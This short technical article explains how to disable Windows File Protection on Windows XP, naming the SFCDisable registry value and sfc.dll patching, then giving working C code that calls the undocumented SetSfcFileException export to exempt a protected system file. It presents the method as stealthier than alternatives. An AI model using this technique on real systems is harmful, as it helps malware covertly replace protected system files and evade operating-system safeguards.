Introduction
There are many ways to disable WFP. Among them is setting the Registry value SFCDisable
found at "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" to 2, patching sfc.dll.
But, there is another method which will be discussed in this article. This is using the SetSfcFileException
Win32 API function.
SetSfcFileException function
This function is exported by sfc_os.dll. Normally, it makes Windows to allow modification of any protected file given in the parameter during a 60 second period. But I tested it under WinXP and I discovered that its effect is unlimited!
Of course, this function is used in a privileged session! Its main role is to disable the Windows warning dialog when a protected file is modified; this is stealthier than terminating/patching services or changing Registry values.
The prototype of the SetSfcFileException
function is:
SetSfcFileException(DWORD param1 , PWCHAR param2 , DWORD param3);
param1
: Always set to 0param2
: The full path of the file to modify laterparam3
: Always set to -1
A small demonstrative program
Let's try to disable the WFP concerning the "c:\windows\system32\calc.exe" file:
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);
void Disable_WFP() {
hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;
SetSfcFileException=(CPP)GetProcAddress(hmod,(LPCSTR)5);
SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);
}